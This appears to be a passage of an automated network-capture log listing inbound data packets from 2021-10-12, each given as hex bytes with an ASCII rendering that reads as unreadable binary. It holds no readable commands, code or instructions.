2021-10-12 14:35:51 UTC	163	IN	Data Raw: 30 68 cd 1c d4 03 93 6e 40 b7 d8 80 2f 8a 5c f8 c5 c4 91 f4 e2 8d 2b 9a db c1 d4 09 d8 3e 99 c8 f6 8c cc ec 19 77 3d e6 88 41 66 ad eb d2 ee 98 e7 03 13 4a f8 55 81 80 27 ee 92 d4 b5 d9 d7 88 48 3d 14 97 73 e3 09 d9 ab 15 11 26 64 42 ba c3 09 6b 02 a0 8a 6e b8 74 b9 e5 fb c4 89 84 5e 8c bf e8 d4 ef 52 18 4d 60 45 3c 7d 5e 36 e3 d8 0b 2f 69 0c 82 1c 17 43 78 27 5d e7 66 e3 83 5c d4 84 98 fa c3 24 b4 56 26 4d ab 24 dd ab 31 ab b1 6c 92 ff 54 ea d6 9f ea 5e 17 6e 6f bd 45 c2 c6 7a 55 6e 07 bf 3f fb f3 15 95 9a 92 4c 28 c3 d2 9a 86 16 0e 97 f6 17 c7 23 a1 e8 64 90 6f 6a d1 40 88 34 f3 42 d4 7e f6 99 40 ee 34 5c f7 5a e7 5b fb f3 5d 68 7f eb ab bf 3c 42 1a 04 63 77 dd 44 0a 6a 52 b8 50 1e 25 c6 9b 0b 7b dd 3e 23 64 78 ba ea f4 22 f3 2a 70 c3 76 2c 4b d4 42 5b Data Ascii: 0hn@/\+>w=AfJU'H=s&dBknt^RM`E<}^6/iCx']f\$V&M$1lT^noEzUn?L(#doj@4B~@4\Z[]h<BcwDjRP%{>#dx"*pv,KB[
2021-10-12 14:35:51 UTC	164	IN	Data Raw: 3f 16 29 57 4c 24 82 e4 28 91 df 64 48 05 ae f0 cd 14 c7 2b 56 01 75 11 ab 58 7c 1c f7 8c 9e 0b 0f ae 4b 5c 6c 7a 34 29 9e 78 7d 11 0c 24 e4 a8 2f 1d 6d ad db 21 bd 2b 5a 2e f5 24 22 b6 be 94 a2 36 07 e3 15 f0 4c 12 50 47 84 30 a0 82 be d3 a9 d6 75 b7 38 5c ec fd 14 8d e4 b3 7c a6 56 78 d0 b7 34 57 9a 3a 91 92 55 0e ea e1 3f f0 6a 7c ae 5e ab 98 96 e3 4f 08 ac e6 3f 73 fc 64 67 85 3f ce 67 e0 82 a0 db 0e 8f 21 31 3e 96 63 b1 c4 59 39 6f d4 9b 91 52 66 b1 6a c5 55 25 2c 15 ae 2d 9c 48 b7 63 60 4a 4e 81 21 63 36 8f 2d d8 28 73 7a 79 f7 35 6f 89 2d 9d 0e aa cc 37 30 fa 9f 05 cb 4a b9 a2 38 49 5f 2f 97 43 22 74 c5 3e e2 e7 ad 8a ea 2e d5 33 fb 08 07 c5 67 a2 99 64 95 ef 56 64 38 cf ef 0b fb d7 a7 1b 42 80 5d 85 85 a7 2c f3 8a 78 91 b4 a4 b5 58 b6 97 f6 34 89 Data Ascii: ?)WL$(dH+VuX\|K\lz4)x}$/m!+Z.$"6LPG0u8\\|Vx4W:U?j\|^O?sdg?g!1>cY9oRfjU%,-Hc`JN!c6-(szy5o-70J8I_/C"t>.3gdVd8B],xX4
2021-10-12 14:35:51 UTC	166	IN	Data Raw: 9c 9d 91 16 98 3b 78 09 1c 94 25 9a 7d 02 96 a7 ad 03 9a a7 f9 00 7f 9d 61 ee a4 b7 2a cd 59 6f 01 44 c9 8f 5d 51 b9 79 02 21 67 2e f8 9b 85 5e bd 3d f7 fd 67 da 13 be 61 ca db b0 90 a6 dc 81 58 aa c9 cc a1 5b 14 1c 87 50 fd cc 3a a4 05 d6 39 a1 02 91 ce 6f 65 c7 2b 90 63 1c 68 bd a7 dd d7 b0 95 5a 58 d1 e7 0c f3 52 5c 55 6d af 29 29 c5 3f f0 d7 28 6f 9e 3b c9 71 27 a5 66 3d 4d 7a 77 26 ea 44 c2 5f b6 1a 49 34 a7 15 7b 2b 14 23 9d 23 77 ee b7 6d d2 c3 2c af 08 98 aa 35 56 2b 27 bc 05 49 cc 01 ea 6e 14 a9 7b be 7e 1f d3 9d da cc 34 6b 94 a1 a5 10 ac 83 e5 1e 87 b7 1f fb 2c 34 24 fe e4 55 c0 e0 b8 d6 39 6d be c3 37 7a 4f 49 bf 67 a1 cf 24 f8 15 59 57 71 0e b3 2f dc 40 18 f3 64 90 ec 75 fe 67 a1 1d e9 75 06 6c 14 36 e6 67 e3 05 79 f7 c2 82 df 18 2d 3d 61 3a Data Ascii: ;x%}a*YoD]Qy!g.^=gaX[P:9oe+chZXR\Um))?(o;q'f=Mzw&D_I4{+##wm,5V+'In{~4k,4$U9m7zOIg$YWq/@dugul6gy-=a:
2021-10-12 14:35:51 UTC	167	IN	Data Raw: c7 a0 56 d9 5d 13 40 d8 49 86 31 20 b3 a3 54 de 71 78 54 2e a2 bb 03 24 7d 58 f6 7f 05 87 0e 38 ce f0 99 c3 5f 5e c6 c7 48 42 2c b4 28 c5 6e 51 47 91 bb 31 bd 8d 4a ef ef cf 34 06 7c da e7 7e 32 d9 e0 ae 1f b4 23 2f b5 89 04 4e 07 61 11 d3 de 26 96 90 85 29 cb 58 b5 14 5a f7 5f c5 9e 71 e4 5e 31 57 4b 87 e2 b4 4b 9d 09 6a c4 4b cb e9 d2 13 a6 b2 39 a9 6d 9a ce c1 15 d1 3a 82 b0 bf a0 31 54 4b d3 a2 a6 ba d3 1c f7 5e 0f 85 12 c5 2f 96 f4 ad 54 a7 3f db 42 9f a3 50 60 a5 72 c2 67 3a 2a fb 6a 95 af 48 b0 63 32 94 65 83 27 62 c2 60 1f 61 2f 71 ec 78 89 14 6d 89 ba 9d 35 5a ca 8c 2d ff a7 07 cd 5e 71 a5 0a 4a 5b d9 00 f9 b3 6b c2 3e 75 8e 9b 88 ec 2f cb ce c9 b1 00 c7 a3 a3 ab 81 8c ef 04 7e 0a c7 e8 b0 6d d4 d8 04 44 17 cb 84 bc a4 28 e5 97 a3 a9 b4 a2 b5 ae Data Ascii: V]@I1 TqxT.$}X8_^HB,(nQG1J4\|~2#/Na&)XZ_q^1WKKjK9m:1TK^/T?BP`rg:*jHc2e'b`a/qxm5Z-^qJ[k>u/~mD(
2021-10-12 14:35:51 UTC	168	IN	Data Raw: 4f 70 7d 0e 8e 0c 80 90 16 a3 b6 68 1a 3d 03 31 4f 66 0c 97 a7 84 29 8a 25 f8 11 fe 0c f5 2c ad bb 9d d1 c1 72 00 c4 39 82 e8 db b9 9c c2 07 77 2c f9 9b 6a f4 ad 29 d6 6a b2 1e 0b b0 60 ca 78 93 80 24 dd 97 df 30 d8 34 a8 55 16 12 97 52 fc 4c c3 bb 35 43 39 a5 51 ac c3 6d 64 c7 ba 18 6e 08 49 2a ed e2 cd a2 94 5a 85 c4 ea 8e f2 44 38 dc 61 bd 21 39 6e 84 bd d5 29 6f 5a 0b 82 6f 21 02 58 30 5d e4 29 26 99 4a d4 50 b0 f2 fe d4 b6 06 2d e3 e3 22 dd 3d 21 7f ab 77 91 3b 78 3e cc 65 8a 2b 00 ab 75 aa 45 a6 dc 81 48 79 07 33 4f 3e e9 1e 97 92 8c 1d 2b 05 d9 ae a3 36 6d 85 f6 1c d1 26 88 d4 73 43 7b 6f f8 8a eb fe ee 56 fd 7d f6 4a 60 7c 14 5f f7 fd 9c 4f d2 f9 5d 56 51 e0 ad ec 3f cf 16 b8 08 65 dd f2 23 68 7b 31 51 1a 2a 97 a8 95 0a f8 31 63 57 68 ba 4b d5 09 Data Ascii: Op}h=1Of)%,r9w,j)j`x$04URL5C9QmdnIZD8a!9n)oZo!X0])&JP-"=!w;x>e+uEHy3O>+6m&sC{oV}J`\|_O]VQ?e#h{1Q1cWhK
2021-10-12 14:35:51 UTC	169	IN	Data Raw: 8f 8b 53 e2 cf 06 20 c1 f8 48 29 1e 44 52 de 2b 29 e5 d7 07 df 64 54 02 af f0 2b 17 74 24 fd 00 c2 89 ab 58 b8 1d f1 8c 78 08 cd ae e0 5d 2e e0 34 29 cf 7b 39 13 25 30 20 a8 84 1c 6f ad db 21 29 2a 5c 36 46 02 04 b4 0b 95 a0 36 03 e3 0a f7 0a 11 21 4c fd 3f 16 83 bc d3 a9 d6 58 a0 7e 5f 93 f6 d2 82 56 b2 de a6 56 78 a8 b4 72 54 eb 31 fd 9d ee 0f e8 e1 3f f0 31 6b a8 46 8c bd b0 e1 f5 09 ae e6 3f 73 35 67 21 86 4e c5 16 ef 15 a1 de 0e 8f 21 ea 29 d0 60 ce cf ab 36 fe d5 9e 91 52 66 a6 6e 83 56 49 27 40 a1 b1 9d 4a b6 63 60 90 57 87 39 58 11 90 2f 46 29 71 7b 79 f7 08 6b cf 2e f0 07 9a c3 a9 31 f8 9e 05 cb 5d a2 e4 3b 2a 56 16 98 dd 23 76 c4 3e e2 8c a9 cc e9 5e dc b5 f4 96 06 ac fd a2 99 83 8a fe 4e 39 1d 43 ee 95 fa 61 84 1b 42 17 5c 83 9d 9c 0b f6 8b 81 Data Ascii: S H)DR+)dT+t$Xx].4){9%0 o!)\6F6!L?X~_VVxrT1?1kF?s5g!N!)`6RfnVI'@Jc`W9X/F)q{yk.1];V#v>^N9CaB\
2021-10-12 14:35:51 UTC	171	IN	Data Raw: 27 86 64 20 8e d8 71 ac 15 82 10 87 26 12 89 36 74 0d 1c 94 30 95 7d 00 53 a6 32 2d a0 a5 44 06 df 9b f4 f3 b6 b7 4a d4 31 63 2a 44 89 99 c9 4c b8 79 d9 0b 50 1d 09 8a 40 74 09 2d f7 fd b3 f5 10 bc f7 cb c2 9b aa a4 29 95 fe a7 d9 ce b3 5b 81 13 0b 56 d6 cc ff b8 14 d4 38 a1 4b bc 91 6a 24 dd 90 98 1a 0b 68 bd ec e9 d7 b2 86 5c 75 d5 c0 0e a6 45 19 4b 60 ad 3b 29 f1 32 38 d7 03 6f 3e 02 83 73 26 a5 43 21 0f 7f e1 3c b3 4a 08 58 b1 1c eb 32 a7 17 6f bf 58 20 f7 3d 7d 74 aa 6a 92 dd 69 2f 05 9b 27 31 2a ab e9 a1 44 57 ca 07 5b 68 8a 9a dd 2f c3 1e 33 9f 8d 4c 28 6c c3 bf 29 02 d5 87 dc 1c b5 2a 89 fa 64 2a 61 7e 6f 53 f8 f6 c4 56 dd 72 f7 dd 61 fa 0e 4e cb 7f 07 5e f8 f9 3d 64 50 77 ac b5 2f de 44 9f d2 61 f7 f2 bf 5b 7a a6 50 f7 30 86 5b 17 6b f3 1b 63 db Data Ascii: 'd q&6t0}S2-DJ1cDLyP@t-)[V8Kj$h\uEK`;)28o>s&C!<JX2oX =}tji/'1DW[h/3L(l)da~oSVraN^=dPw/Da[zP0[kc
2021-10-12 14:35:51 UTC	172	IN	Data Raw: e7 5d 2d d6 75 d0 82 7e 1d 19 51 20 8d d8 94 7c 17 58 55 81 22 04 0c 2a d9 de 29 54 12 ea f1 bc 16 08 2d d0 f6 77 d0 ab 15 b8 01 b3 8d ef 09 de a8 cd 18 43 5f 30 67 cf 2b 39 10 11 24 33 ae a9 4b 42 53 da 6f 2a 76 1e 2f 7c 27 f5 b0 26 17 a8 13 07 ac 09 67 08 13 4d 47 53 36 3b 0d b4 2d a8 99 5b 3c 7c 5d f1 fd c3 8b 7b 89 ea 88 57 28 ab 64 70 56 9a 3a 46 94 c3 47 dc 79 3c a0 32 b7 ea 5f b6 98 41 e5 d8 c5 bb c3 3b 22 36 77 22 84 22 ce b8 e6 38 7b cb f0 8e 70 e9 35 d3 62 ac c4 ba 3f d3 f2 80 b4 56 34 a5 3e 80 54 38 2c fb a8 9c dc 54 48 62 32 93 0b c4 20 62 34 61 2b 6b b0 7e 55 78 a4 0b fb cc 2c 9c 0c 58 ca 84 99 f7 06 06 98 5e 3e e7 39 48 5d d9 91 f0 95 57 75 3a b6 8f 79 cf eb 2f d7 c9 fd bb c7 e6 db a6 cd 83 56 aa 57 79 38 c5 e8 b8 dd c9 ef 1a 17 17 4c c3 84 Data Ascii: ]-u~Q \|XU")T-wC_0g+9$3KBSov/\|'&gMGS6;-[<\|]{W(dpV:FGy<2_A;"6w""8{p5b?V4>T8,THb2 b4a+k~Ux,X^>9H]Wu:y/VWy8L
2021-10-12 14:35:51 UTC	173	IN	Data Raw: a2 c9 b0 4a 1d 15 bc 8d 06 ac a9 71 e4 81 83 0c 80 90 10 bb 0c 4d 22 3e e5 30 09 e9 01 97 a7 84 28 92 9f dd 50 fd ea f4 87 2d b6 9d d1 c1 73 00 d3 38 80 c8 3d b8 19 40 0a 77 2c f9 9a 6a 68 aa 2c f6 8c b3 81 88 bd 60 ca 78 82 80 33 dc f7 dc d6 d9 06 2b 5a 16 12 97 44 fc 5b c2 3b 36 a5 38 15 7a bc c3 6d 64 c1 a2 a2 4b 0d 69 cc ec 59 48 b3 94 5a 85 a2 e9 99 f3 d2 39 3a 60 a5 a5 28 6e 30 e3 d3 31 55 7f 09 82 02 26 e6 dd 20 5d 78 76 40 9a 3c c4 52 b0 6d eb 60 39 16 2d ab 83 66 de aa 20 90 aa 1b 92 bd f7 2e cc 99 ea 3a 18 eb 50 3d 45 26 ca d3 c5 69 07 ab 2d 28 e9 89 96 a8 a8 3d 28 44 5e be a3 16 0e 93 f6 8b d0 06 ac 8b 64 fe fc 7f f8 52 88 e8 ee c1 fc 2f d2 af 61 76 92 4f f7 79 f7 59 d2 6e 5c 19 75 03 ac 89 ac df 16 98 64 73 dd 65 22 0f 5f d2 50 63 b3 87 a8 15 Data Ascii: JqM">0(P-s8=@w,jh,`x3+ZD[;68zmdKiYHZ9:`(n01U& ]xv@<Rm`9-f .:P=E&i-(=(D^dR/avOyYn\udse"_Pc
2021-10-12 14:35:51 UTC	175	IN	Data Raw: 66 05 b6 5c a4 36 0e 27 ab 75 38 5a 77 e2 14 91 36 c1 4f 49 89 12 25 55 35 fb 0d e5 23 90 c9 64 c3 03 f0 fb c1 16 18 cb d9 00 7e 10 bd 58 a4 1a 03 87 92 09 8a 4e c4 5d 6e 7a 22 29 d3 7c 23 1a 6c 24 af 48 a0 1c 6f ad ca 21 bd 2b f1 04 01 27 75 57 2f 95 a0 36 12 e3 9e f6 87 38 30 47 7b d2 32 83 bc d3 bf d6 47 a7 28 57 8c fd 77 66 72 b2 de a6 40 78 6f b5 bf 47 e7 3a 32 7e ca 0f e8 e1 29 f0 a5 6a d0 75 cb 98 bd 13 d1 09 ae e6 29 73 2a 60 19 ae 5f ce 0c c2 30 a1 de 0e 89 39 d3 0c 85 63 d1 c4 c2 ca da d5 9e 91 44 66 32 6f 1d 7e 45 2c 07 5a 95 9d 4a b6 75 60 04 56 71 0a 1f 34 3d db 62 29 71 7b 6f f7 17 6c 83 01 e1 0c e8 3b 8d 31 f8 9e 03 d3 64 87 81 1b 35 5d 11 60 f9 23 76 c4 38 fa b5 8c db c6 52 d7 09 03 b2 06 c7 67 c4 9a f5 9a fc 56 04 38 cc 14 b1 fa d5 a6 1d Data Ascii: f\6'u8Zw6OI%U5#d~XN]nz")\|#l$Ho!+'uW/680G{2G(Wwfr@xoG:2~)ju)s*`_09cDf2o~E,ZJu`Vq4=b)q{ol;1d5]`#v8RgV8
2021-10-12 14:35:51 UTC	176	IN	Data Raw: 1f 69 9f 79 3b a1 b4 b0 95 19 0f 86 a8 25 19 d8 06 b8 e0 80 71 80 6a 14 a1 36 68 0b 8b 94 d0 97 88 02 ea a7 92 2a 88 a5 f8 00 48 9b 55 e7 43 b5 e0 d1 f3 71 02 44 39 93 5e 4c b2 7a 2c 09 0a 2c b7 98 68 74 ad 3f 60 fd b6 e3 e5 be 1d ca 12 90 82 a4 dd 81 69 a7 e7 cd 46 59 6b 12 12 51 fe cc c3 ad 83 d4 30 b6 be be be 6d c4 c4 b8 98 6e 1e ff bd 84 ea 22 b0 e9 5a 39 c7 e8 0e f2 52 8e 4b 25 ba ce 2b 13 30 34 d6 2b 6f 5a 1a 14 73 91 a6 b6 23 20 78 85 25 9b 4a d4 41 26 1c 84 25 52 15 50 ab 8c 26 df 3d 21 6e 3d 6a 93 d9 9c 2d b1 99 c0 2f 02 ab 75 bb d3 57 7c 1f ae 6a 7a ab 6b 3a eb 1e 97 83 1a 4c 03 68 36 bd de 16 6c 81 f4 1c d1 37 1e fa e6 30 94 7c 85 52 f6 fa ec 56 fd 6c 60 dd 34 fe fb 4c 8a 79 6e 4b d0 f9 5d 47 c7 77 ed ae da dc 6b 98 d1 61 df f2 23 7e ed a6 d9 Data Ascii: iy;%qj6h*HUCqD9^Lz,,ht?`iFYkQ0mn"Z9RK%+04+oZs# x%JA&%RP&=!n=j-/uW\|jzk:Lh6l70\|RVl`4LynK]Gwka#~
2021-10-12 14:35:51 UTC	177	IN	Data Raw: 7b ee dc 09 5f 66 8a ad 5e 33 37 1e ba d6 2b d1 62 74 9f 14 20 2d c3 d8 48 3f 80 58 97 87 c2 0e 98 23 42 d2 66 54 02 ae 66 bc a7 09 cd da 7d 7e e4 a6 5a b8 1d f7 1a ef 3f d9 48 c7 20 6e 6c 3a 2b cf 7b 7d 87 11 c7 32 4e a3 61 6f 95 d5 23 2a 2a 5a b8 7c 4b f2 50 2c e8 a0 6f 0d e1 09 f7 4c 84 4d 12 51 d6 31 fe bc a9 a7 d4 5b a0 38 ca f1 d3 cb 6b 71 cf de 3a 58 7a ab b4 34 c1 9a b6 44 74 c9 72 e8 5f 31 f2 32 6b ae c8 b6 83 4b 05 d2 74 ae 06 31 71 36 67 67 13 22 77 ba 06 32 dc de 0c 80 23 e9 29 96 f5 ac be ae df d9 a8 9e b5 5d 64 a5 6e c5 c3 38 cf f9 48 96 e0 4a f0 6c 62 93 57 81 b7 62 90 75 cb 61 54 71 1c 76 f5 0b 6b 89 bb 9c 01 5b 2a 8e 4c f8 16 0a c9 5e a2 a2 ae 48 55 cf 71 fa 5e 76 6d 31 e0 8f a9 8a 7c 2f 96 ca 1d b1 7b c7 ad ad 9b 83 8a ef c0 79 33 d2 08 Data Ascii: {_f^37+bt -H?X#BfTf}~Z?H nl:+{}2Nao#*Z\|KP,oLMQ1[8kq:Xz4Dtr_12kKt1q6gg"w2#)]dn8HJlbWbuaTqvk[L^HUq^vm1\|/{y3
2021-10-12 14:35:51 UTC	178	IN	Data Raw: 35 e8 ba d9 eb 90 6b 29 7b dd 35 c9 68 7a fd 0f fb a8 c1 96 da 71 ac 06 14 0c 24 95 f0 a1 4b 68 0e 07 96 30 95 6e 96 97 a5 b5 cf 88 d8 f8 27 c4 99 f4 f3 a5 21 9d 0d c4 94 02 39 39 db d2 4e b8 79 ca 9d 77 00 c8 7d 68 09 ad 55 ec ff b3 f5 03 2a 60 dd 7e 75 82 d9 dd 0a e5 a5 d9 ce a0 cd 16 80 a6 b4 fe b1 c3 01 0f d6 38 a1 58 2a c3 2c 62 21 b8 e5 6e d3 73 bf ec e9 c4 24 94 12 b7 22 e8 73 f2 bd 02 49 60 ad 28 bf 6e 5b e5 33 2b 12 5a 0b 99 71 26 a5 50 b7 5d 9c 42 c0 9b 37 d4 72 ab 1e eb 32 b4 81 2d ca 82 c4 df 40 21 3a b0 68 92 dd 7a b9 cc 5c ec cd 02 d6 75 ce 5e 55 ca 07 48 fe 07 1f 2c d8 eb 63 97 15 97 4e 28 6c d0 29 a3 2f 09 63 f4 61 d1 80 93 f8 64 2a 72 e8 f8 b4 89 18 ec 2b fd b5 ed df 61 fa 1d d8 f7 16 f0 a9 d0 84 5d bc 4a 75 ac b5 3c 48 16 c0 66 83 df 8f Data Ascii: 5k){5hzq$Kh0n'!99Nyw}hU`~u8X,b!ns$"sI`(n[3+Zq&P]B7r2-@!:hz\u^UH,cN(l)/cad*r+a]Ju<Hf
2021-10-12 14:35:51 UTC	180	IN	Data Raw: 68 d4 ea e0 ef 9a da 3a 9d 22 c2 01 46 5e 4e 37 3d 0a d4 75 d0 84 e0 e2 0d b0 c6 c3 a5 48 7b 30 5a 55 81 24 9a e5 ed 94 39 66 29 02 cb d6 be 16 08 2b 4e 00 2e 31 4d 5a c5 1d 71 aa ed 09 de ae 53 5d 96 7e d2 2b b2 7b d5 37 13 24 33 a8 37 1c 15 8c 3d 23 57 2a 90 08 7e 27 f5 b6 b8 95 82 33 e5 e1 74 f7 a7 34 4f 47 53 30 a5 83 26 f6 4f d4 26 a0 35 7b f3 fd c3 8d e5 b2 8d a3 b0 7a d6 b4 1a 70 98 3a 46 92 5d 0f 3d ca d9 f2 4f 6b fe 79 b4 98 41 e3 46 09 d3 e3 d9 71 4b 67 15 a2 20 ce b8 e0 a6 a1 05 3e 69 23 94 29 02 44 ae c4 ba 39 4d d5 39 94 b4 64 d8 6e 73 72 3a 2c fb ae 02 9d 4f 87 85 62 ee 57 59 06 60 34 61 2d f5 29 ae 7e 9f f5 76 6b 73 0a 9e 0c 58 cc 1a 31 d7 af e3 c9 23 a2 be 10 4a 5d d9 97 6e 23 6c c2 d8 e0 f2 a9 b4 c2 2d d7 c9 fb 25 06 52 56 44 9b fe 8a b0 Data Ascii: h:"F^N7=uH{0ZU$9f)+N.1MZqS]~+{7$37=#W*~'3t4OGS0&O&5{zp:F]=OkyAFqKg >i#)D9M9dnsr:,ObWY`4a-)~vksX1#J]n#l-%RVD
2021-10-12 14:35:51 UTC	181	IN	Data Raw: 18 0e 3b 78 0b d3 7c c7 e0 3f 6f 6b 54 7b 84 91 cb b0 4a 1b 9b 86 2e 26 69 da 0c ac 7c b0 0e 80 90 16 35 36 0b 1c fb 96 4d 95 f5 32 95 a7 84 29 1c a5 2d 03 38 99 89 f3 19 85 9f d1 c1 72 96 44 da 84 2e 4e c5 79 17 39 75 2c f9 9b fc 74 b2 3b 10 ff ce f5 fd 8e 62 ca 78 93 16 a4 39 98 19 a5 a4 ce bf 68 14 12 97 52 6a cc 8a a9 f3 d6 45 a1 18 8f c1 6d 64 c7 2c 98 71 05 8f bf 91 e9 a5 81 96 5a 85 c4 7c 0e 81 56 fe 49 1d ad ab 1a 6c 30 e3 d5 bf 6f a8 05 64 71 5b a5 f4 12 5f 78 76 26 0f 4a 73 45 56 1e 96 32 71 24 2f ab 83 22 4b 3d 3d 4f 4d 68 ef dd 9d 1c ce 99 ea 2b 96 ab a4 bf a3 55 b7 07 41 5c 05 ab 2d 3e 7f 1e c4 a2 6a 4e 55 6c fa 8b a1 16 0e 85 60 1c 2a 33 6e f8 19 2a 39 4a fa 52 88 fe 78 56 80 4d 10 df 1c fa 70 7a f5 79 f7 4f 44 f9 71 42 b7 75 d1 b5 b3 ea 14 Data Ascii: ;x\|?okT{J.&i\|56M2)-8rD.Ny9u,t;bx9hRjEmd,qZ\|VIl0odq[_xv&JsEV2q$/"K==OMh+UA\->jNUl`3n9JRxVMpzyODqBu
2021-10-12 14:35:51 UTC	182	IN	Data Raw: 45 f7 b4 53 76 15 54 e9 20 ef e7 da b8 35 20 66 05 a0 ca 33 38 14 ca d4 08 d0 20 48 e0 14 91 20 57 d8 e5 3d f0 5a 28 81 e2 32 e7 23 90 df f2 54 52 ba 16 be 6b 08 c3 e6 02 7e 10 ab ce b8 ca f5 6a ed 74 de a7 fa 5f 6e 7a 34 bf cf e3 69 f7 13 59 33 82 9e 1e 6f ad db b7 2a 2b 59 c8 7e 5a f5 fa 11 97 a0 36 03 75 09 0b 59 f4 4f 3a 53 5e 0c 81 bc d3 a9 40 5b 8b 3b ba f3 80 c3 1d 4c b0 de a6 56 ee ab 4b 22 b1 98 47 46 23 f4 0d e8 e1 3f 66 32 34 ad b8 b4 e5 41 31 ef 0b ae e6 3f e5 36 5b 70 63 20 b3 b8 13 0f a3 de 0e 8f b7 e9 a0 95 85 ae b9 ba 2c 9b d7 9e 91 52 f0 a5 08 d2 b3 3a 51 fb 98 d4 9f 4a b6 63 f6 93 8f 82 c7 60 49 61 75 23 2b 71 7b 79 61 0b 8d 9e cb 9e 71 58 b6 cc 33 f8 9e 05 5d 5e 80 a6 de 4a 20 d9 0c b8 21 76 c4 3e 74 8f 4e 93 0c 2d aa c9 46 f3 04 c7 67 Data Ascii: ESvT 5 f38 H W=Z(2#TRk~jt_nz4iY3o*+Y~Z6uYO:S^@[;LVK"GF#?f24A1?6[pc ,R:QJc`Iau#+q{yaqX3]^J !v>tN-Fg
2021-10-12 14:35:51 UTC	183	IN	Data Raw: 19 e9 a8 1a 0e 1c da 3b 05 0b 6b a0 c5 d9 28 89 ff 29 f7 db 45 cb cd 4a c1 47 84 a8 25 8f 4e 71 a9 33 64 0e fd 90 ea e9 34 68 0b 1d 02 30 c0 6f e6 95 da 84 37 c1 a7 f8 00 de 0d f4 4a a3 51 9f ac c1 4d 4b 46 39 93 c8 da b8 d1 cb ed 75 51 f9 fa 21 76 ad 3f f6 6b b3 d8 04 5a 62 b7 78 11 cb a6 dd 81 ff 31 d9 14 a1 bd 14 6f 97 f6 b7 ce c3 ad 15 42 38 c2 5f 5a c1 10 64 01 f1 9a 6e 1e 69 2b ec ee c6 54 96 27 85 2c a1 0c f2 52 18 dd 60 49 2f cf 6c 4d e3 df 65 6d 5a 1a 82 e5 26 26 52 c7 5f 05 76 0a d5 48 d4 41 b0 8a eb 20 be f1 2f d6 83 6c 91 3f 21 6e ab fc 92 6d 78 c9 ce e4 ea 5b 4c a9 75 bb 45 c1 ca 54 5c 8e 05 d6 2d ac a5 1c 97 83 8c da 28 b6 d2 59 a1 6b 0e 36 ba 1e d1 37 88 6c 64 b1 66 98 fa 2f 88 2a a2 54 fd 6c f6 4b 61 fe 1e a8 f5 04 f7 b9 9e fb 5d 47 51 e1 Data Ascii: ;k()EJG%Nq3d4h0o7JQMKF9uQ!v?kZbx1oB8_Zdni+T',R`I/lMemZ&&R_vHA /l?!nmx[LuET\-(Yk67ldf/*TlKa]GQ
2021-10-12 14:35:51 UTC	185	IN	Data Raw: 9b f6 70 3e 95 45 8a b4 b5 b6 17 d4 eb c6 7b 9a 6f 17 ed 20 1b 05 a8 0b 31 37 1e 2c 40 75 4e 81 90 e0 69 91 0a 96 da 48 3f 16 ce 55 7d 14 ea e7 5e 90 94 33 56 02 ae f0 2a 16 de 2e 3e 02 03 10 c7 0f ba 1d f7 8c 79 09 f8 9f 23 5f 13 7a ba 7e cd 7b 7d 11 87 24 33 ae 47 1e 12 ad 74 76 28 2a 5a 2e ea 27 a5 87 c8 97 dd 36 d2 b4 0b f7 4c 12 db 47 68 36 d5 81 c1 d3 5a 81 59 a0 38 5c 67 fd f8 bf 95 b0 a3 a6 42 20 a9 b4 34 57 0c 3a 23 94 2d 0d 95 e1 0a a8 30 6b ae 5e 20 98 7c d0 36 0b d3 e6 69 2b 34 67 67 85 b4 ce 37 e6 d6 a3 a3 0e f7 79 eb 29 96 63 3a c4 b2 0c 3d d7 e3 91 c8 3e a7 6e c5 55 ae 2c a3 af 72 9f 37 b6 df 38 91 57 81 21 f4 34 dd 2b 85 2b 0c 7b a7 af 09 6b 89 2d 0a 0c f3 cd 6a 33 85 9e 05 92 5c a2 a2 38 de 5d e9 90 1e 21 0b c4 1c bb 8d a9 8a ea b9 d7 14 Data Ascii: p>E{o 17,@uNiH?U}^3V.>y#_z~{}$3Gtv(Z.'6LGh6ZY8\gB 4W:#-0k^ \|6i+4gg7y)c:=>nU,r78W!4++{k-j3\8]!
2021-10-12 14:35:51 UTC	186	IN	Data Raw: 00 85 b3 ab 0e 14 e9 3e 18 34 2d 31 39 78 0a d3 6a d4 d9 28 88 69 a9 68 dd a3 c8 b0 ca 08 0d 86 a9 25 0f cb 71 ac 07 82 8c 93 90 16 a2 36 e8 18 1d 94 31 95 ee 13 97 a7 85 29 7e 85 f8 00 dc 9b 39 c3 a5 b7 9c d1 47 52 00 44 3b 93 74 7c b8 79 cb 0b f7 3f f9 9b 6b 74 2d 2c f6 fd b2 f5 83 af 60 ca 79 93 00 b7 dd 81 fe a7 59 dd a0 5b 17 12 17 41 fc cc c2 ad 95 c7 38 a1 59 bc 43 7e 64 c7 bb 98 ee 0d 69 bd ed e9 44 a1 94 5a 84 c4 6a 1d f2 52 19 4b e0 be 28 29 6f 30 65 f5 29 6f 58 1a 3e 43 26 a5 51 21 a9 58 76 26 9b 4a 19 71 b0 1c ea 32 34 04 2d ab 82 22 5d 2e 21 6e aa 6a 12 ce 7a 2f cd 99 6a 38 00 ab 74 bb c5 44 ca 07 49 68 87 b8 2d 3e e8 1e 17 90 8c 4c 29 6c 50 ac a3 16 0f 85 76 0f d1 37 89 fa e4 39 72 7e f9 52 08 ed ee 56 fc 6c 76 ce 61 fa 1c 4e 77 6a f7 4f d3 Data Ascii: >4-19xj(ih%q61)~9GRD;t\|y?kt-,`yY[A8YC~diDZjRK()o0e)oX>C&Q!Xv&Jq24-"].!njz/j8tDIh->L)lPv79r~RVlvaNwjO
2021-10-12 14:35:51 UTC	187	IN	Data Raw: c0 01 76 7c 70 0f cc 21 a3 70 c6 f5 ad 67 d6 10 8d e9 6b f9 a1 df b3 09 18 43 44 a5 cd 31 4c 04 65 d3 0c d2 a3 7d b2 11 20 22 fb fd 78 3a 6f 5a 09 9a 7d 09 8c 21 aa fa 77 54 c3 ac 76 af 70 0d 42 da 68 60 63 ae 89 ba 44 e3 0c ea f0 de 49 eb d1 6b 3b 36 bc c6 49 79 c8 13 35 17 34 a4 b5 6f c0 ef 31 28 f3 58 dc 51 84 f0 9f 2f f5 90 ed 01 02 0b cf 59 c9 4f ae 51 04 32 2b b9 3a ab 38 7c 0e 3d 75 f0 91 f3 65 70 43 dc b8 76 c7 ae a5 35 39 b6 ff 43 f3 ca 9e fd 2a 3a 59 32 94 86 87 b3 41 41 a1 c3 c9 ae 8f 3e 81 1b e1 67 8c 21 f4 9d c6 30 a0 dd 79 a7 b0 ea 28 95 f8 a5 04 ba 28 d8 c8 b3 60 57 07 a4 ab d0 57 3e 2d f8 01 82 ee 4f b7 60 27 89 f4 82 30 61 7a 78 2a 65 38 72 52 4b ee 0d c2 88 f1 8c ec 5b 65 8d 47 e8 8d 05 